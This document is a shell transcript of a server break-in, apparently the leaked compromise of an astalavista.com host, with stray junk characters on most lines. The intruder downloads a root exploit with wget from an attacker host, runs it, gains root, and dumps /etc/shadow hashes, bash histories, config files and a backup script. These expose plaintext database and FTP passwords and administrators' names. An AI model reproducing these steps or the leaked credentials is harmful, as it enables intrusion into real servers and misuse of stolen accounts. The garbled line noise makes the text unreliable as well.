1 \4 r8 J/ `9 Z5 l( \sh-3.2$ uname -a" w0 i  b" z/ H% [+ ~7 g4 O: a& N
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
3 B' d$ Z& U, `sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
  w; f) C" `, D" z# G+ A. i8 `–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
! C( O& l2 |1 JResolving anti.sec.labs… 13.33.33.37% T, E/ `+ d5 ]2 K( G0 \
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
8 O, R$ S% o1 f* mHTTP request sent, awaiting response… 200 OK" b; O  q+ K+ L* B! X! z4 E
Length: 18200 (18K) [text/plain]
! X! E( b- {  E  n$ [( O" ?, f: z. kSaving to: `g0troot’0 D0 D5 Y; m4 \

4 q6 a; t# H. p% h+ C100%[=========================================================================================================================================>] 18,200      58.6K/s   in
! s% Y& w' [" ?1 d8 n2 X$ f8 X8 ?0.3s: K- o3 q0 f1 Z1 U+ u3 U
* V1 _& |+ ^: t! e
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]* r1 }* A) l0 q! `& J, Z
4 B5 L- b, c1 D. u6 L
sh-3.2$ ./g0troot -i x86_64
$ a5 W/ G! m8 P( v[+] g0troot - anti.sec.labs
# O$ F7 F8 }4 r4 Z8 N0 t" U% q[+] Target: 2.6.18-128.1.10.el5
. L( |! Y& ?0 s5 O- g[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
. e4 p! @/ m: {1 `, J& C( R2 `
/ ?% v6 Y4 Q! f& a* O6 i; g1 G[+] r00tr00t
  ~1 n: F& D1 G8 O5 @0 m. G[~] Executing shell…
* p# z- s/ I) [2 C" m4 n
* `) M, \/ H) e" O' O* j4 Z0 @) z2 zsh-3.2# id
. t- I% q0 X3 q. v2 v0 cuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+ F. t! M2 z1 f! g+ C0 n
0 }4 ]1 s1 p7 Q( T3 @sh-3.2# cat /etc/shadow' _) K- g, B6 Z
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::' z5 M8 `- g( i, B
[snip]
  d. F3 m; T" C# O' {admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
, s2 p' v, _' t- @jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
  I- F7 Q; G1 l3 W# j2 f% w9 _com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
6 x: M" e* T" g  Bastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
. h, l% y1 y5 U- v! M- Y; @4 i: T' K* k: h, q8 p
sh-3.2# cat /etc/motd- u) Z3 N" S" F) k' y
#####################################################3 f" d1 y. j2 A! {. h1 t  ~' I
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
$ q  B+ z. W; }2 ?# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
" Y& S+ X6 G, G' a# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #0 r$ r6 |+ n0 T. B. g6 c
#                                                   #8 [& K5 N9 H+ k, Y) @" d
#####################################################
, {6 ?5 M! _$ P# q#                                                   #( Z2 M3 j3 P' e3 ~1 n# \
# Admin Contact - 链接标记support@secureservertech.com      #$ C+ @$ m$ n7 H! S
#                                                   #- t  L9 L0 @- n: H' |( E
# Available ShortCuts                               #
2 g1 l& P# {0 X: T#                                                   #3 l* j. Q' w% K$ u& m/ @9 D' _) N
# nst -  list active connections                    #
* |& }& G" M# T- c# ddos - shows how many times each ip is connected  #% z; X0 |' [& D/ t, U
# ltr -  restart the webserver                      #- Q& H/ c% s2 F. M) P
# phpc - edit the php config file                   ## T# ?1 R5 @6 z+ M/ G" i
# htc -  edit the webserver configuration file      #
' ^' d  e$ g. u- ^& l$ c- v3 v# up -   uptime                                     #
: @: m( }. M# s( [  V# etd - edit the motd of the day file               #
4 A3 z6 Q+ ]  k( K1 V2 s# htr - start and restart apache if needed          #
. R+ n1 e6 m: T* ^# n: Y! j/ ]# syng - shows active SYN_RECV connections          #% }7 Y; Y1 b" A, l
# synd - syn flood blocker - “synd -h” for usage    #: g2 L6 ~! A* M2 B% Z8 r+ p
#####################################################1 M6 B; g% J+ s
# NOTES:                                            #  f8 k& S5 |6 L3 R2 S* A
# Last Upgrade - 12-08-2008 by JF                   #
6 C5 P. E9 s2 ]# My.cnf/Mysql Optimization - 1-28-09               #
% V9 T& l+ p7 r  y# q#                                                   #$ b: b! u+ g, t' s/ x% |4 |$ |; r
#                                                   #
, o1 K) T  M' {1 h! P' J* L#                                                   #0 [1 i, Q6 E) l5 l
#####################################################
  m$ k4 q" a( V# _, @9 c
' ]5 t& d* q8 j3 }; V2 Gsh-3.2# lastlog | grep -v Never6 @: m2 W) H7 f  I1 v5 ?
Username         Port     From             Latest
4 S% T. |0 c9 R+ [/ l0 e4 c' {. F- xroot             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 20099 i) E7 A+ q) Q7 J6 d5 x
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 20088 B0 H  ^* Z- k4 i; U) A( d: H
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
: \! i" ?5 x, yastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
- k! a5 y) R& Q+ d# p5 j
  b# _4 I" o2 [3 o9 `sh-3.2# ls -la  C9 u! j4 |$ h+ o% `8 J
total 453376
3 P% s* Y& c* T5 {& S2 ldrwxr-x— 15 root root       4096 Jun  4 08:40 .
! M- @. a! y4 x' C. y( B# _( p5 ~) g! _drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..; Q  g) W& c0 R9 l# K. I
-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
6 ]1 _5 t! v$ i-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg. a4 N. n: O. r7 ?
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history/ F9 W. V, r8 \4 D5 |0 F
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
$ {; k# D. l% s. W  p-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
8 R8 R1 F1 z/ `: D9 s' P' V8 \-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc/ F3 T7 }% m0 J8 l; T
-rwx——  1 root root       1899 Oct 28  2007 bk.sh8 q( E4 X; S5 u
-rw-r–r–  1 root root       1327 Nov 29  2007 cert  t6 C! ~3 y& X5 D& E4 x
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
* G) m' C* N' H) _2 hdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan
1 E3 @' b, ?9 V- P% J-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
- j2 J$ `4 U* Q" B-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql% m  [9 q. {) U0 O1 \3 O9 Y
drwx——  2 root root       4096 Oct 28  2007 .elinks
; x  l7 T% J5 r$ q& y/ Idrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.10 d2 S/ {' t/ N& M8 G  J
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz28 t3 ^/ @# ?+ |5 s" r
-rw——-  1 root root          0 Apr 16 13:19 .history
6 }" s( [' `/ U7 i) }-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
* M. Y7 U4 L! `) x/ v-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog6 w* Y/ x* y* n0 a, W0 I
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
# o( g* a% ^) ?3 v: L-rw——-  1 root root         35 Jun  2 14:23 .lesshst  F! a# y- b+ \0 |+ ~6 |' v8 o! s
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
% e3 Q! k! R7 J0 u( |9 y9 wdrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
' ~/ c! M. k) \  J) @* {, W! g- R-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
6 @- D4 @6 Q' b8 i* [-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2: J  x' S0 a. |3 \7 G+ l& h! [: e
-rwx——  1 root root        760 Sep 18  2008 lp. a5 j* X2 w1 a9 V& I. p3 |
drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
( c1 t6 x, h- J( O/ i8 N-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz7 j7 b/ s  V# [, l+ F
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
/ ~' y4 b4 g( ]) q- P; E0 K* pdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9+ j+ H( f( H$ ?* P' Z- Z2 B
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
( T9 s0 v# v6 z7 {6 H, a# fdrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
+ [8 b4 r8 _) a& |" s-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz' J$ s  s+ z1 E/ c1 w# }+ f
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh, X3 e. F2 c6 P% \
-rw——-  1 root root         41 Oct 19  2007 .my.cnf7 V, P6 ^% O- \) |/ z! }* x$ C9 ^5 }; N
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history3 m' D9 {5 A. j7 w. d0 u7 c
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
  ?2 ?6 v& S1 t-rw——-  1 root root         41 May 20  2008 .mytop+ A, ^) t1 z  a( f
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
1 R& y2 }) g& ~' L' c& G-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
  Z0 }! \* D# S; ]! ?drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
, m5 P7 w$ f  u' H/ A" I-rw——-  1 root root       1462 Sep 21  2007 opt.php
+ E. {# i) |! Z1 U-rw-r–r–  1 root root       3371 Sep 22  2007 p
1 V: f3 X& ?7 E0 A& a-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2/ I# [4 j, k' M' y5 a2 Z3 d
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
$ s6 h0 |/ s3 e& ~8 a. K& }-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
9 h3 k0 J' \  e# K% H1 W! O-rw-r–r–  1 root root        887 Nov 28  2007 server.key
& F. h7 [4 s: z5 {9 M: Hdrwx——  2 root root       4096 Oct 10  2008 .ssh% D3 F! B7 [2 S! x1 ?% @8 R5 c
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
& @) a8 p$ z, m% V: R- _" Y-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc' `$ e, f9 K# l8 A3 p0 c# t
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
# s) x- N5 u+ T-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1( k+ `7 D+ N' n
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
8 v  l& \: k8 I+ b1 [% C: v5 w-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh3 e  q# n: H$ {2 D$ m
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
& T$ ]2 W! D& N" U) u& F-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
, z! e8 y& h; {6 I-rw——-  1 root root      12997 May 16  2008 .viminfo" ?) N8 p8 _# s7 j- \, b/ {8 U" c

# }! R) U7 K! O" m- d- y, G' {sh-3.2# cat .bash_history0 S) a' F# P& v7 d) z: E
[snip]( ^3 Q; ]3 f- G! d" Z- \, l0 \4 _3 I
wget cp4sst.com/sstlinux.tar.gz
. J3 V+ P6 N. Z& R3 S6 D) wtar zxvf sstlinux.tar.gz% e1 U2 H' X, f* ^4 u+ C
cd linux-2.6.27.105 V7 D6 R6 T7 [  Y3 {/ }' z5 y3 q8 x/ G
sh install.sh3 N1 l5 H$ \. m
make bzImage ; make modules ; make modules_install ; make install9 B' A/ ^: F  A, d
make clean
, R5 B+ J7 l6 E) gservice mysqld restart+ n! V6 h3 `  J' m, F
[snip]$ ~" E4 k+ q$ e! g+ l! p/ J
cd /usr/sbin/
- p4 @5 R6 x( B1 u. c  h/ i( bchmod 4777 traceroute
. f3 l0 B7 ^/ H5 r3 M5 |, [chmod 4777 ping/ a+ y. G3 R; C! y
traceroute -I 链接标记[url]www.astalavista.ch[/url]
2 c3 x& {% x# d5 g4 S- \( |[snip]! v8 `" [0 M+ U
vi /etc/csf/csf.conf) J6 o0 {8 s$ e9 l8 z1 ?
traceroute google.ch
* d' o! g3 x7 Y, Kservice csf restart
, U$ U7 E" ^8 R# x7 g7 t5 xtracert google.ch
. N' L* S8 m# T( ^- oservice csf restart% n- V0 Y( r  \! `; b1 D4 T' t
traceroute 链接标记[url]www.google.ch[/url]
6 [/ C3 c: p4 b) e( r: l$ d1 o* q3 {tracert 链接标记[url]www.google.ch[/url]; O! A( l! U) @) T3 p9 a; h8 @
traceroute 链接标记[url]www.google.ch[/url]" M# _  i5 L) J0 D" P
locate traceroute
& t' q0 `2 t9 e3 @5 F+ ?" B- A: {chown 4755 /bin/traceroute& O# f! X, W$ d7 H' z
chown 4777 /bin/traceroute1 b0 c# _: i9 w# W( Q( z
locate ping6 z* R0 d, a' y" Z2 A0 ?
chown 4755 /bin/ping
2 ~2 G/ T0 I1 e# q5 xchown 4777 /bin/ping! z, l4 V- C0 n0 e5 j% u
cd /bin/
" R, Z7 c, r% L' wls -ali | grep ping( n+ q- \. m3 ?* ?( d3 [+ l5 \
chown root ping+ q8 @9 |  W8 p, B- U
chmod 4755 ping' g# H* R/ Q; r+ P- i) [
ls -ali | grep traceroute) H; @) M3 b) a
chown root traceroute
$ L% o, Q6 L0 b% K1 g2 Bchmod 4755 traceroute% _. d3 x- q7 S6 z+ s
ls -ali | grep traceroute8 L# L) p/ G8 B! c6 U! n+ [
traceroute -I 链接标记[url]www.google.ch[/url]: T7 M! g/ J2 W7 w
traceroute 链接标记[url]www.google.ch[/url]" S5 q/ T- f6 K2 R/ F" o
whois pmsantos.ch
" Q. `& b: M6 E9 |% [( ~6 s1 s[snip]/ [3 [; Q# M5 p# A
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
: f5 U$ _" K' t( w( ^7 Hmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
2 @& c$ b! z5 ]7 d( u/ amysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql' `* D+ [% Y1 ~2 R' h$ I
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
2 L: O& F0 s9 H& F+ z/ S" ptop
; z; t- d3 i# w5 v7 Z' yping ssth.ch
' e8 e/ g& x( a$ ^ping asdlkfaljgasd???ljg???lasj.ch
  l, E% I3 V+ n, r8 Y# H0 Vping asdlkfaljgasdlasj.ch
+ [8 j3 ~8 E3 Iping 链接标记[url]www.ssth.ch[/url]# V8 _1 t% x7 K/ K. u
ping ssth.ch
/ p2 u) G% g" i' T* x5 e5 [nslookup 链接标记[url]www.google.ch[/url]
* |4 N, h" J# @* Q( u$ c! g" @nslookup 链接标记[url]www.ssth.ch[/url]
6 m/ X( B, N% d% b1 D0 Eman nslookup
$ O' q0 r! d$ ^( i4 @* I9 lping 链接标记[url]www.google.ch[/url]
3 c4 L7 [! P0 wnslookup 链接标记[url]www.google.ch[/url]
) j' }( |1 p0 |$ W8 F/ h) \nslookup 链接标记[url]www.google.ch[/url]  U0 N  A/ y' c- ?
nslookup salfjasdlf.ch1 B# M3 b4 b: N) l5 v. I
[snip]- K" l) I7 B+ o6 \9 h+ N
openssl passwd -1 sadf
- p4 {9 l" G0 b3 d$ v" |& k0 w" Xopenssl passwd -1 5cZNHstdTy
" g+ E$ `* W; @: |mysql6 a- z& a! f. U2 _7 ]
mysql
2 i0 H) b0 }* ?  v# wlocate proftp! t3 g. `6 _' ?3 H' e
vi /etc/proftpd.passwd# Z) j, C2 j- ?# d; i7 d/ k
service proftpd restart4 W, c# q) q, M" A
locate proftpd.conf. w0 u2 W: H1 N/ ~2 M; {
vi /etc/proftpd.conf
% c" Y- v5 q4 t4 n- w+ ]$ o" x+ q) Evi /etc/proftpd.passwd
1 g1 \0 d  {- ?8 V/ J! sservice proftpd restart
% }% l  f+ ~. m, D& l1 `, @[snip]' ?5 C) i' n$ ?6 b6 a4 w4 k
/bin/sh /home/com/backup_system/backup.sh
" b; e2 h$ d  }4 N7 utar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
  L/ q" L" z$ Z7 J3 t2 a4 Dmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
+ ^1 x: i& B2 C/ {$ Mmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql# y* v7 n  P! I& A
ls -ali9 n  x$ F  T% e' C9 R
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql8 l! h- _1 |: x5 @
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
! S/ B2 D  m9 t  [" _0 R: K. Ecrontab -l
% [) m  t/ A# v$ \) E; Dcrontab -l: M7 m! h; ^# Y
php -q /home/com/public_html/modifications/cronjobs/securitynews.php7 D. Z, n7 c) j/ ]& U( P* h1 o
/home/com/public_html/modifications/cronjobs/exploits.sh
0 V3 g1 H7 o; E1 _& ^: o, Swget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]/ z1 }: m# U6 u
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz8 S/ Z5 Y) S. |
cd lsws-4.0.3
; f# H* G) n! v$ qsh install.sh9 m' l1 p  C7 |: f( [% q
uptime6 X  ^1 f/ d6 x
hdparm -tt /dev/sda
2 S( k" C2 C! y2 O$ wiostat: H) k6 P2 c% a4 n% J& q  H
yum install iostat
. I3 {+ Z. b4 z) L2 W/ {iostat
( ~4 W' b, F$ N* W6 pwhereis iostat7 G; k, t7 N% J4 \, X
yjm clean all7 M; `& O; i: Q' u
yum clean all ; yum -y update
# F. O1 n; ?1 q. V# J( Uiostat
  D* X) |6 p& j9 Jyum install systat
8 c) {& w. Y/ Xrpm -qa | grep iostat
, [( }; R7 k% \. I9 ~rpm -qa | grep sysstat
: F* B- Y0 K, X' s+ q. a# krpm -qa | grep systat
! s( E4 u/ |6 T% P3 ~- _- Mdmesg -c" I4 u+ E) |9 k) _7 l( e: U
sysctl -p! V1 A$ B+ P5 @8 _) E2 F# C* [
uname -r7 Z# o& A& f* _2 C/ {
cd /usr/src
. s0 h! ~- A! qwget nix101.com/kernels/sstlinux.tar.gz
: [% k1 Y  K. W# g8 G" {shutdown -r now
1 {$ a' X. m( T4 p, T) Gnano -w /boot/grub/grub.conf  A0 n% E& X7 `2 @  X4 j
1 N. ?: b- w& L$ A
sh-3.2# cat .my.cnf0 s$ @" ?5 d* q* x: n+ w% m$ _: t" C
[client]
4 F; _3 w- u0 S8 Guser=da_admin  a- [  M; p8 H& e* I
password=X9dctmRH
! N# v: Q" F' m2 @: q& ]  O) u7 v8 V- |  a& Z
sh-3.2# cat /home/com/backup_system/backup.sh
+ v/ Z& P/ d3 k6 h- j- J#!/bin/sh
, h* S4 Z0 `- P" j- Y% N#####################################################################1 L0 k$ l: @* C& e
#                                                                   #
- V$ c  F' n6 e- O4 U0 H#   incremental backup for astalavista.com                          #
! `: P8 e2 ^, Z5 R# i' S4 w! S#                                                                   #  B- Y+ W' b" z6 Z' G6 e6 J3 E8 Y
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
: p6 X) U/ ]4 V( B8 ?9 y: E#                                                                   #
9 p8 t0 B! [; X& Q- d2 t% ]% @& f#####################################################################
5 a" x9 @) D' n* N! ^[snip]- T0 h* j) o7 ^* F! [
PROG_DIR=”/home/com/backup_system”;
% P7 u: ^# `, g1 T2 J( oBACKUP_DIR=”/home/com/backups”;
7 J6 n& b( H9 F9 ?* M. dDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
, L$ R8 Q8 r2 @" R- s+ B$ B# ftp for synology backup server
: }8 f. n8 G; h% |" I3 hFTP_HOST=”212.254.194.163″;
7 ], e9 B2 r$ h7 Q# u4 oFTP_PORT=”21″;
$ |/ |& ?+ }: q* X5 k2 QFTP_USER=”astalavista.com”;
9 ^* y9 W/ H0 I/ @! H& X8 C2 e1 wFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
/ `% Z" B4 N7 a7 y# PFTP_DIR=”/astalavista.com”;
; f) R( m4 x7 p3 w3 ~# D% P# database
! a2 o/ M- H1 O2 JDB_HOST=”localhost”;
" G# Y5 j2 R! |DB_USER=”contrexxuser2″;
. l3 p, Y" q$ U( i% f! ^0 ADB_PASS=”0fEYNZgXz1pKe”;/ a2 h+ v. U, n0 Z+ b
DB_DATABASE1=”com_contrexx2_live”;
& m( S# K+ d' g$ N3 ^4 FDB_DATABASE2=”com_contrexx2″;" u; M8 r: ?5 _+ z/ g& ~/ j+ H
[snip]& V8 X& |# T8 s& Z3 P/ j/ k
ftp -in $FTP_HOST $FTP_PORT <<EOF
; \& k5 J+ n0 y! C1 Y& W% _quote USER $FTP_USER
/ c) w- F2 G# u+ z9 ~& Lquote PASS $FTP_PASS
' w7 K- W; I0 T, E) t- W8 vcd $FTP_DIR, t9 W; M3 b( [& g5 v
put $DB_FULLNAME-SQL_Dump.tar5 o, R7 _& d. i9 X# ~
put $BACKUP_FULLNAME-Public_HTML.tar
* A  v! Q1 D/ L$ v+ n( W8 {close
8 `/ J- z: Y! r* Z0 {bye
" q  `  I( [- e6 x. ~' a* X+ QEOF
2 Q% ~* b/ d) k9 B; D% D; B3 a& W% y. y' c
sh-3.2# cd /home+ S/ @2 L4 b7 m6 J" j; I
sh-3.2# ls -la
! W$ g! h* o% t5 c- k% Z, Wtotal 1200 o4 T; ]* M# B9 L) G+ @" @
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .  c+ g% T  Y1 N- m% Y
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..1 R8 d9 o) a9 Q' Q/ c' I6 K
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin4 Z6 }3 ~9 C/ m1 ?& I0 a7 |% ]
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
4 a. C/ L5 r$ V  d5 y& z-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
2 z6 @* b0 U8 ddrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
2 b4 L! R: i. T, K9 rdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
2 q3 t5 T, v# J; ]9 cdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
& J7 h: z& @% \7 e) {8 u. A4 Y$ jdrwx–x–x 10 com     com      4096 Apr 28 12:40 com
# _# T5 i6 h: r; kdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
6 n- a. l5 T: B$ ~drwx——  3 jon     jon      4096 Sep 21  2007 jon
, K! r. g* ]* E  udrwx——  2 root    root    16384 Sep 11  2007 lost+found
) ^) J. L5 b  r7 r) B+ O. \6 Odrwxr-xr-x  2 root    root     4096 Sep 14  2007 my( x+ }5 S" }" Q/ k$ m
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata8 g; ^! C3 t" D/ m
drwx——  2 jon     jon      4096 Sep 15  2007 test' n$ i/ L* @  l* i9 S7 \5 w" N
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
; T1 x+ _; j& y6 d
6 R$ \. l$ Y' X4 A1 Bsh-3.2# cd admin' L. D6 m7 x5 e/ O6 U6 S
sh-3.2# ls -la' t' M$ Z0 ?3 u1 O$ _
total 1735896- Q4 x% l, G& f4 m) @$ A0 O$ x
drwx–x–x  9 admin admin       4096 Nov 28  2007 .- V& v; z9 e0 D. X
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..' p& x1 y) n0 q, P% Z& d
drwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
8 g! S, x! P5 G9 Idrwx——  2 admin admin       4096 Sep 28  2007 backups1 c" F% H8 l& D6 S' P4 n. q
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history' {) \) T5 q: I# a
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout: N* E( C( B) t( Y: Z2 z
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile, V, x( L# J3 p  K$ E
-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc5 p/ ^  R& w: x
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
  j& @- _7 t0 r6 P" o! ]- Kdrwx–x–x  6 admin admin       4096 Sep 21  2007 domains4 H" o+ o" I% [* M) e, y' V
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap, l& k: g9 W" m2 g
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
0 {2 y3 P: ?2 z/ z% y9 ^" @drwx——  2 admin admin       4096 Sep 21  2007 mail0 `3 C6 y1 `( y) F* V( p
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
% A" R/ g- [- V0 [! {-rw-r–r–  1 root  root         887 Nov 28  2007 server.key. ^& ]& o) e. F% i/ m2 V. X
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
" h; |$ K8 ~) D. L3 N-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
4 C$ r/ d6 _. Z7 H  _7 ?drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
  i' [* I9 a! \% W$ }3 S% G7 T
* K5 n# u- c# l/ gsh-3.2# ..
) v& U1 Z) s2 x0 _1 F/ [% gsh-3.2# cd jon4 P: O& }$ J, G
sh-3.2# ls -la
5 X& l9 E- U& o& F' p. utotal 36
2 S) D& x% X' ^7 Hdrwx——  3 jon  jon  4096 Sep 21  2007 .
% B, C) K6 y( G" T: i/ Ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ @; I1 G' D- J- X# O-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history4 r1 X% c: A& n& }/ }0 h+ a1 O
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout+ G; A7 ], l0 i1 u$ q, S
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
8 ?. Q* C% D& q: ^4 j2 [-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
; L, v9 D. @5 A8 c-rw-r–r–  1 root root   24 Sep 21  2007 info.php
$ I# i: N2 ?% {; v. a: Gdrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html' c! m$ u1 C) g

6 D4 t: C+ Z3 w3 Q) t; Gsh-3.2# cd ..8 c. Y' J1 U8 S1 J4 F4 V
sh-3.2# cd test+ j+ f) R. B% h: r% q; F& J4 C. Y
sh-3.2# ls -la8 T; D$ O% c0 {, G: Z) t5 u
total 48
2 E# O8 {2 t7 j" V5 g1 D3 Idrwx——  2 jon  jon  4096 Sep 15  2007 .
& f1 B7 n. a$ F9 X" c! sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) y- w2 S- [; K4 ?4 ^1 c
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
5 w, i2 R+ N, H! o8 g/ v8 V-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
. l7 E8 @. Q: g# L% [-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile) L% P) m' ?/ d2 z5 r5 @8 F8 c
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
  W# w3 Z! J( e/ j5 e# x  xsh-3.2# cat .bash_history
; v( G7 u  N6 E$ ^  U/usr/bin/mysqladmin -u root password PoliuJhytg671 H  F3 j# z. [% `
7 H  K' O% n: d, ^
sh-3.2# cd ..
2 {3 ~- a$ |* ]sh-3.2# cd astanet
; [# `9 g' m1 i3 S7 q3 m9 b* gsh-3.2# ls -la( y! }- F' c! Y4 c
total 52$ `3 b1 ?* e5 H; y. q& Z+ J" m
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .. K/ ?& B6 @3 I1 P
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..; H6 E: m+ _: }; F& s. ^
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
, g1 i% F( t% Z5 O7 \-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history; V/ ]3 k) ]* w, M
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout5 g" i( q3 u" f( Y% t
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
- q: N3 T4 y+ L' e! n3 ~; F-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc! @: {2 c2 ^! |' j+ a
